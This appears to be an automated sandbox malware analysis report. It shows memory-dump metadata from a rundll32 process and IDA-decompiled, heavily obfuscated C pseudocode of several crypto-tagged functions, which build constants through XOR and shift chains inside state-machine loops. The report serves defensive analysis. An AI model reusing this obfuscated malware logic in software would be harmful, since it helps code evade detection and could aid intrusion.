                                                                                                                                    0x002d4485
                                                                                                                                    0x002d4489
                                                                                                                                    0x002d448e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4407
                                                                                                                                    0x002d440d
                                                                                                                                    0x002d450a
                                                                                                                                    0x002d4513
                                                                                                                                    0x002d451e
                                                                                                                                    0x002d4525
                                                                                                                                    0x002d4527
                                                                                                                                    0x002d4529
                                                                                                                                    0x002d452f
                                                                                                                                    0x002d4531
                                                                                                                                    0x002d4531
                                                                                                                                    0x002d452b
                                                                                                                                    0x002d452b
                                                                                                                                    0x002d452d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d452d
                                                                                                                                    0x002d4529
                                                                                                                                    0x002d4413
                                                                                                                                    0x002d4413
                                                                                                                                    0x002d4419
                                                                                                                                    0x00000000
                                                                                                                                    0x002d441f
                                                                                                                                    0x002d4430
                                                                                                                                    0x002d4434
                                                                                                                                    0x002d4438
                                                                                                                                    0x002d443d
                                                                                                                                    0x002d4442
                                                                                                                                    0x002d4448
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4448
                                                                                                                                    0x002d4442
                                                                                                                                    0x002d4419
                                                                                                                                    0x002d440d
                                                                                                                                    0x002d4405
                                                                                                                                    0x002d43f9
                                                                                                                                    0x002d4535
                                                                                                                                    0x002d453e
                                                                                                                                    0x002d453e
                                                                                                                                    0x002d44f1
                                                                                                                                    0x002d44f6
                                                                                                                                    0x002d44f7
                                                                                                                                    0x002d44fc
                                                                                                                                    0x002d44fc
                                                                                                                                    0x002d44fc
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,a$`2$?
                                                                                                                                    • API String ID: 0-2087061617
                                                                                                                                    • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                    • Instruction ID: 2127ababe095194d40387de314877b82c2f0881b7c165bde18d997db64056898
                                                                                                                                    • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                    • Instruction Fuzzy Hash: B5A130724183819FC368DF65C98A40BFBF1BBC4708F408A1DF5DA96260D3B58A598F46
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C59F2 Relevance: 4.0, Strings: 3, Instructions: 202COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C59F2() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t202;
				void* _t208;
				intOrPtr _t209;
				void* _t214;
				void* _t222;
				intOrPtr _t237;
				intOrPtr _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;

				_t247 =  &_v1140;
				_v1056 = 0x36f622;
				_v1052 = 0x8ed67e;
				_t214 = 0xf737bb2;
				_v1048 = 0x93fb3c;
				_t240 = 0;
				_v1044 = 0;
				_v1076 = 0x48eb17;
				_v1076 = _v1076 + 0x189d;
				_v1076 = _v1076 ^ 0x00442401;
				_v1100 = 0xa45863;
				_v1100 = _v1100 << 2;
				_t241 = 0x1d;
				_v1100 = _v1100 * 0x7c;
				_v1100 = _v1100 ^ 0x3e6538f4;
				_v1108 = 0x56f1ad;
				_v1108 = _v1108 | 0xbff0a597;
				_v1108 = _v1108 / _t241;
				_v1108 = _v1108 ^ 0x06946226;
				_v1132 = 0xc3fd0a;
				_v1132 = _v1132 << 8;
				_v1132 = _v1132 + 0xffff9bc2;
				_t242 = 0x18;
				_v1132 = _v1132 / _t242;
				_v1132 = _v1132 ^ 0x0821d39f;
				_v1068 = 0xc66dea;
				_v1068 = _v1068 + 0xffff0514;
				_v1068 = _v1068 ^ 0x00c0919e;
				_v1136 = 0x72811d;
				_v1136 = _v1136 ^ 0x5ea2c622;
				_t243 = 0x5d;
				_v1136 = _v1136 * 0x4f;
				_v1136 = _v1136 * 0x41;
				_v1136 = _v1136 ^ 0xd3c4c324;
				_v1096 = 0x2e25e6;
				_v1096 = _v1096 ^ 0xbdbebaf9;
				_v1096 = _v1096 ^ 0xbd932287;
				_v1060 = 0x3d42d8;
				_v1060 = _v1060 << 6;
				_v1060 = _v1060 ^ 0x0f5887f2;
				_v1116 = 0xec9c1f;
				_v1116 = _v1116 >> 1;
				_v1116 = _v1116 + 0xcef9;
				_v1116 = _v1116 ^ 0x0078140d;
				_v1084 = 0xf6a299;
				_v1084 = _v1084 >> 9;
				_v1084 = _v1084 ^ 0x00023821;
				_v1124 = 0xf6e97d;
				_v1124 = _v1124 + 0xffff8c4c;
				_v1124 = _v1124 / _t243;
				_v1124 = _v1124 | 0xda1c672f;
				_v1124 = _v1124 ^ 0xda1e012d;
				_v1120 = 0x9bdb66;
				_v1120 = _v1120 * 0x47;
				_v1120 = _v1120 + 0xdb13;
				_v1120 = _v1120 * 0x64;
				_v1120 = _v1120 ^ 0xe2e3c71f;
				_v1112 = 0x9fec0e;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 | 0xd7512eb2;
				_v1112 = _v1112 ^ 0xffdc645c;
				_v1104 = 0xc74eee;
				_v1104 = _v1104 + 0x930c;
				_v1104 = _v1104 ^ 0x28280d38;
				_v1104 = _v1104 ^ 0x28ef0d26;
				_v1064 = 0xc36095;
				_v1064 = _v1064 | 0x2d8f7273;
				_v1064 = _v1064 ^ 0x2dcb1501;
				_v1140 = 0xa3c477;
				_v1140 = _v1140 ^ 0xb16da3ec;
				_v1140 = _v1140 ^ 0x8917fdcb;
				_v1140 = _v1140 >> 0xe;
				_v1140 = _v1140 ^ 0x000e0fa0;
				_v1128 = 0x58136;
				_v1128 = _v1128 << 6;
				_v1128 = _v1128 << 0x10;
				_v1128 = _v1128 + 0xffffe729;
				_v1128 = _v1128 ^ 0x4d79f308;
				_v1072 = 0x735c84;
				_t244 = 0x7f;
				_v1072 = _v1072 / _t244;
				_v1072 = _v1072 ^ 0x0002b970;
				_v1080 = 0x91f75b;
				_v1080 = _v1080 + 0xffffc39e;
				_v1080 = _v1080 ^ 0x009f463e;
				_v1088 = 0xdf4dcf;
				_v1088 = _v1088 | 0x05792173;
				_v1088 = _v1088 ^ 0x05f69aec;
				_v1092 = 0xf44447;
				_v1092 = _v1092 * 0x78;
				_v1092 = _v1092 ^ 0x728504a1;
				do {
					while(_t214 != 0x89b0ee) {
						if(_t214 == 0x291094f) {
							E002C3C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
						} else {
							if(_t214 == 0x6a25a64) {
								E002DDA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
								_t247 =  &(_t247[4]);
								_t214 = 0xe0c4196;
								continue;
							} else {
								if(_t214 == 0xe0c4196) {
									_push(_v1096);
									_push(_v1136);
									_t208 = E002DDCF7(_v1068, 0x2c1000, __eflags);
									_pop(_t222);
									_t209 =  *0x2e3e10; // 0x0
									_t237 =  *0x2e3e10; // 0x0
									E002C47CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
									E002CA8B0(_v1112, _t208, _v1104);
									_t247 =  &(_t247[9]);
									_t214 = 0x89b0ee;
									continue;
								} else {
									if(_t214 != 0xf737bb2) {
										goto L10;
									} else {
										_t214 = 0x6a25a64;
										continue;
									}
								}
							}
						}
						L13:
						return _t240;
					}
					_push(_v1128);
					_push( &_v1040);
					_push(_v1140);
					_t202 = E002E13AD(_v1064,  &_v520, __eflags);
					_t247 =  &(_t247[3]);
					__eflags = _t202;
					_t240 =  !=  ? 1 : _t240;
					_t214 = 0x291094f;
					L10:
					__eflags = _t214 - 0xb653a05;
				} while (__eflags != 0);
				goto L13;
			}










































                                                                                                                                    0x002c59f2
                                                                                                                                    0x002c59f8
                                                                                                                                    0x002c5a02
                                                                                                                                    0x002c5a0a
                                                                                                                                    0x002c5a0f
                                                                                                                                    0x002c5a1b
                                                                                                                                    0x002c5a1d
                                                                                                                                    0x002c5a21
                                                                                                                                    0x002c5a29
                                                                                                                                    0x002c5a31
                                                                                                                                    0x002c5a39
                                                                                                                                    0x002c5a41
                                                                                                                                    0x002c5a4d
                                                                                                                                    0x002c5a50
                                                                                                                                    0x002c5a54
                                                                                                                                    0x002c5a5c
                                                                                                                                    0x002c5a64
                                                                                                                                    0x002c5a74
                                                                                                                                    0x002c5a78
                                                                                                                                    0x002c5a80
                                                                                                                                    0x002c5a88
                                                                                                                                    0x002c5a8d
                                                                                                                                    0x002c5a99
                                                                                                                                    0x002c5a9e
                                                                                                                                    0x002c5aa4
                                                                                                                                    0x002c5aac
                                                                                                                                    0x002c5ab4
                                                                                                                                    0x002c5abc
                                                                                                                                    0x002c5ac4
                                                                                                                                    0x002c5acc
                                                                                                                                    0x002c5ad9
                                                                                                                                    0x002c5ada
                                                                                                                                    0x002c5ae3
                                                                                                                                    0x002c5ae7
                                                                                                                                    0x002c5aef
                                                                                                                                    0x002c5af7
                                                                                                                                    0x002c5aff
                                                                                                                                    0x002c5b07
                                                                                                                                    0x002c5b0f
                                                                                                                                    0x002c5b14
                                                                                                                                    0x002c5b1c
                                                                                                                                    0x002c5b24
                                                                                                                                    0x002c5b28
                                                                                                                                    0x002c5b30
                                                                                                                                    0x002c5b38
                                                                                                                                    0x002c5b40
                                                                                                                                    0x002c5b45
                                                                                                                                    0x002c5b4d
                                                                                                                                    0x002c5b55
                                                                                                                                    0x002c5b63
                                                                                                                                    0x002c5b67
                                                                                                                                    0x002c5b6f
                                                                                                                                    0x002c5b77
                                                                                                                                    0x002c5b84
                                                                                                                                    0x002c5b88
                                                                                                                                    0x002c5b95
                                                                                                                                    0x002c5b99
                                                                                                                                    0x002c5ba1
                                                                                                                                    0x002c5ba9
                                                                                                                                    0x002c5bae
                                                                                                                                    0x002c5bb6
                                                                                                                                    0x002c5bbe
                                                                                                                                    0x002c5bc8
                                                                                                                                    0x002c5bd5
                                                                                                                                    0x002c5be2
                                                                                                                                    0x002c5bea
                                                                                                                                    0x002c5bf2
                                                                                                                                    0x002c5bfa
                                                                                                                                    0x002c5c02
                                                                                                                                    0x002c5c0a
                                                                                                                                    0x002c5c12
                                                                                                                                    0x002c5c1a
                                                                                                                                    0x002c5c1f
                                                                                                                                    0x002c5c27
                                                                                                                                    0x002c5c2f
                                                                                                                                    0x002c5c34
                                                                                                                                    0x002c5c39
                                                                                                                                    0x002c5c41
                                                                                                                                    0x002c5c49
                                                                                                                                    0x002c5c57
                                                                                                                                    0x002c5c5a
                                                                                                                                    0x002c5c5e
                                                                                                                                    0x002c5c66
                                                                                                                                    0x002c5c6e
                                                                                                                                    0x002c5c76
                                                                                                                                    0x002c5c7e
                                                                                                                                    0x002c5c86
                                                                                                                                    0x002c5c8e
                                                                                                                                    0x002c5c96
                                                                                                                                    0x002c5ca3
                                                                                                                                    0x002c5ca7
                                                                                                                                    0x002c5caf
                                                                                                                                    0x002c5caf
                                                                                                                                    0x002c5cc1
                                                                                                                                    0x002c5dc8
                                                                                                                                    0x002c5cc7
                                                                                                                                    0x002c5cc9
                                                                                                                                    0x002c5d69
                                                                                                                                    0x002c5d6e
                                                                                                                                    0x002c5d71
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5ccf
                                                                                                                                    0x002c5cd1
                                                                                                                                    0x002c5ce3
                                                                                                                                    0x002c5cec
                                                                                                                                    0x002c5cf4
                                                                                                                                    0x002c5cfa
                                                                                                                                    0x002c5d05
                                                                                                                                    0x002c5d1c
                                                                                                                                    0x002c5d2f
                                                                                                                                    0x002c5d3e
                                                                                                                                    0x002c5d43
                                                                                                                                    0x002c5d46
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5cd3
                                                                                                                                    0x002c5cd9
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5cdf
                                                                                                                                    0x002c5cdf
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5cdf
                                                                                                                                    0x002c5cd9
                                                                                                                                    0x002c5cd1
                                                                                                                                    0x002c5cc9
                                                                                                                                    0x002c5dd0
                                                                                                                                    0x002c5ddc
                                                                                                                                    0x002c5ddc
                                                                                                                                    0x002c5d78
                                                                                                                                    0x002c5d80
                                                                                                                                    0x002c5d81
                                                                                                                                    0x002c5d90
                                                                                                                                    0x002c5d97
                                                                                                                                    0x002c5d9b
                                                                                                                                    0x002c5d9d
                                                                                                                                    0x002c5da0
                                                                                                                                    0x002c5da5
                                                                                                                                    0x002c5da5
                                                                                                                                    0x002c5da5
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: &($&($%.
                                                                                                                                    • API String ID: 0-466442461
                                                                                                                                    • Opcode ID: 9acc0af54c4d476e0866cba7db8b8204ba5d0b399564822fe14f5af64e44b9c1
                                                                                                                                    • Instruction ID: 897dc9c8dddedacef5d35ddc56b35d432eda9f3503fbf44cad597134d4720521
                                                                                                                                    • Opcode Fuzzy Hash: 9acc0af54c4d476e0866cba7db8b8204ba5d0b399564822fe14f5af64e44b9c1
                                                                                                                                    • Instruction Fuzzy Hash: 25A13FB01183819FC798CF26C58981BFBE1FBC4348F008A1DF5A696220D7B5CA59CF86
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002E13AD Relevance: 3.9, Strings: 3, Instructions: 169COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002E13AD(void* __ecx, void* __edx, void* __eflags) {
				void* _t197;
				signed int _t222;
				signed int _t226;
				void* _t236;
				void* _t245;
				void* _t246;

				_t245 = _t246 - 0x6c;
				_push( *((intOrPtr*)(_t245 + 0x7c)));
				_push( *((intOrPtr*)(_t245 + 0x78)));
				_push( *((intOrPtr*)(_t245 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t197);
				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
				 *(_t245 + 0x38) = 0xf8747;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
				 *(_t245 + 0x4c) = 0x1e90b9;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
				 *(_t245 + 0x54) = 0x94d35;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
				 *(_t245 + 0x40) = 0x2ce8ae;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
				 *(_t245 + 0x58) = 0x43e6f3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
				 *(_t245 + 0x24) = 0x72d00d;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
				 *(_t245 + 0x34) = 0x43d743;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
				 *(_t245 + 0x2c) = 0xa6821;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
				 *(_t245 + 0x60) = 0x210575;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
				 *(_t245 + 0x44) = 0xde4c18;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
				 *(_t245 + 0x50) = 0xde2575;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
				 *(_t245 + 0x18) = 0x52bd7f;
				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
				 *(_t245 + 0x3c) = 0xe72c64;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
				 *(_t245 + 0x48) = 0x12926a;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
				 *(_t245 + 0x5c) = 0xf2f3b3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
				 *(_t245 + 0x64) = 0x250dfe;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
				 *(_t245 + 0x68) = 0x1b0053;
				_t226 = 0x44;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
				 *(_t245 + 0x30) = 0x848c63;
				_t142 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
				 *(_t245 + 0x28) = 0x69c662;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
				 *(_t245 + 0x20) = 0x70b48b;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
				 *(_t245 + 0x1c) = 0x80403c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
				_push( *(_t245 + 0x58));
				_push( *(_t245 + 0x40));
				_t236 = 0x1e;
				E002C4B61(_t142, _t236);
				_t166 = _t245 - 0x220; // 0x12da7b13
				E002C4B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
				_t169 = _t245 - 0x428; // 0x12da790b
				E002C4B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
				_t171 = _t245 - 0x220; // 0x12da7b13
				E002C3BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
				_t176 = _t245 - 0x428; // 0x12da790b
				E002C3BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
				_t183 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 - 0x14) =  *(_t245 + 0x38);
				_t185 = _t245 - 0x220; // 0x12da7b13
				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
				_t187 = _t245 - 0x428; // 0x12da790b
				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
				_t222 = E002C4DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
				asm("sbb eax, eax");
				return  ~_t222 + 1;
			}









                                                                                                                                    0x002e13ae
                                                                                                                                    0x002e13b9
                                                                                                                                    0x002e13be
                                                                                                                                    0x002e13c1
                                                                                                                                    0x002e13c4
                                                                                                                                    0x002e13c5
                                                                                                                                    0x002e13c6
                                                                                                                                    0x002e13cb
                                                                                                                                    0x002e13cf
                                                                                                                                    0x002e13d3
                                                                                                                                    0x002e13da
                                                                                                                                    0x002e13e1
                                                                                                                                    0x002e13e8
                                                                                                                                    0x002e13ef
                                                                                                                                    0x002e13f2
                                                                                                                                    0x002e13f9
                                                                                                                                    0x002e1404
                                                                                                                                    0x002e140b
                                                                                                                                    0x002e1412
                                                                                                                                    0x002e1415
                                                                                                                                    0x002e141c
                                                                                                                                    0x002e1423
                                                                                                                                    0x002e142a
                                                                                                                                    0x002e1431
                                                                                                                                    0x002e1438
                                                                                                                                    0x002e143c
                                                                                                                                    0x002e1440
                                                                                                                                    0x002e1447
                                                                                                                                    0x002e144e
                                                                                                                                    0x002e1455
                                                                                                                                    0x002e145c
                                                                                                                                    0x002e1460
                                                                                                                                    0x002e1467
                                                                                                                                    0x002e146e
                                                                                                                                    0x002e1475
                                                                                                                                    0x002e147c
                                                                                                                                    0x002e1483
                                                                                                                                    0x002e148a
                                                                                                                                    0x002e1491
                                                                                                                                    0x002e1498
                                                                                                                                    0x002e149f
                                                                                                                                    0x002e14a6
                                                                                                                                    0x002e14ad
                                                                                                                                    0x002e14b4
                                                                                                                                    0x002e14bb
                                                                                                                                    0x002e14bf
                                                                                                                                    0x002e14c6
                                                                                                                                    0x002e14cd
                                                                                                                                    0x002e14d4
                                                                                                                                    0x002e14db
                                                                                                                                    0x002e14e2
                                                                                                                                    0x002e14e9
                                                                                                                                    0x002e14f0
                                                                                                                                    0x002e14f4
                                                                                                                                    0x002e14f8
                                                                                                                                    0x002e14ff
                                                                                                                                    0x002e1506
                                                                                                                                    0x002e1513
                                                                                                                                    0x002e151a
                                                                                                                                    0x002e1525
                                                                                                                                    0x002e1528
                                                                                                                                    0x002e152f
                                                                                                                                    0x002e1536
                                                                                                                                    0x002e153d
                                                                                                                                    0x002e1544
                                                                                                                                    0x002e1548
                                                                                                                                    0x002e154f
                                                                                                                                    0x002e1556
                                                                                                                                    0x002e155a
                                                                                                                                    0x002e1561
                                                                                                                                    0x002e1568
                                                                                                                                    0x002e156f
                                                                                                                                    0x002e1576
                                                                                                                                    0x002e157a
                                                                                                                                    0x002e1581
                                                                                                                                    0x002e158a
                                                                                                                                    0x002e1591
                                                                                                                                    0x002e159e
                                                                                                                                    0x002e159f
                                                                                                                                    0x002e15a2
                                                                                                                                    0x002e15a6
                                                                                                                                    0x002e15ad
                                                                                                                                    0x002e15b4
                                                                                                                                    0x002e15c0
                                                                                                                                    0x002e15c3
                                                                                                                                    0x002e15c6
                                                                                                                                    0x002e15cd
                                                                                                                                    0x002e15d4
                                                                                                                                    0x002e15df
                                                                                                                                    0x002e15e2
                                                                                                                                    0x002e15e9
                                                                                                                                    0x002e15f0
                                                                                                                                    0x002e15f7
                                                                                                                                    0x002e15fe
                                                                                                                                    0x002e1609
                                                                                                                                    0x002e160c
                                                                                                                                    0x002e1613
                                                                                                                                    0x002e1616
                                                                                                                                    0x002e161b
                                                                                                                                    0x002e161c
                                                                                                                                    0x002e1629
                                                                                                                                    0x002e1632
                                                                                                                                    0x002e163f
                                                                                                                                    0x002e1648
                                                                                                                                    0x002e164d
                                                                                                                                    0x002e1661
                                                                                                                                    0x002e1666
                                                                                                                                    0x002e167c
                                                                                                                                    0x002e1684
                                                                                                                                    0x002e1687
                                                                                                                                    0x002e168d
                                                                                                                                    0x002e1693
                                                                                                                                    0x002e1696
                                                                                                                                    0x002e169c
                                                                                                                                    0x002e16b0
                                                                                                                                    0x002e16ba
                                                                                                                                    0x002e16c4
                                                                                                                                    0x002e16cc

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !h$5M$d,
                                                                                                                                    • API String ID: 0-3324333736
                                                                                                                                    • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                    • Instruction ID: fc6b538aecd8e6de5c9208c9711b14628841a23698ff0e787e28a158b3703fe7
                                                                                                                                    • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                    • Instruction Fuzzy Hash: DD91CEB141038C9BCF58DF65C98A9DE3FB1BB04358F509219FD2A96260D3B5C999CF84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DDEDC Relevance: 3.9, Strings: 3, Instructions: 162COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002DDEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t132;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t175;
				void* _t177;
				void* _t178;

				_push(_a16);
				_t174 = _a12;
				_t175 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t132);
				_v68 = 0x4bd93;
				_t178 = _t177 + 0x18;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x4bd93000;
				_t158 = 0xc7349d4;
				_v72 = 0xdd086a;
				_v72 = _v72 + 0xe602;
				_v72 = _v72 ^ 0x00de9932;
				_v80 = 0x3b4fac;
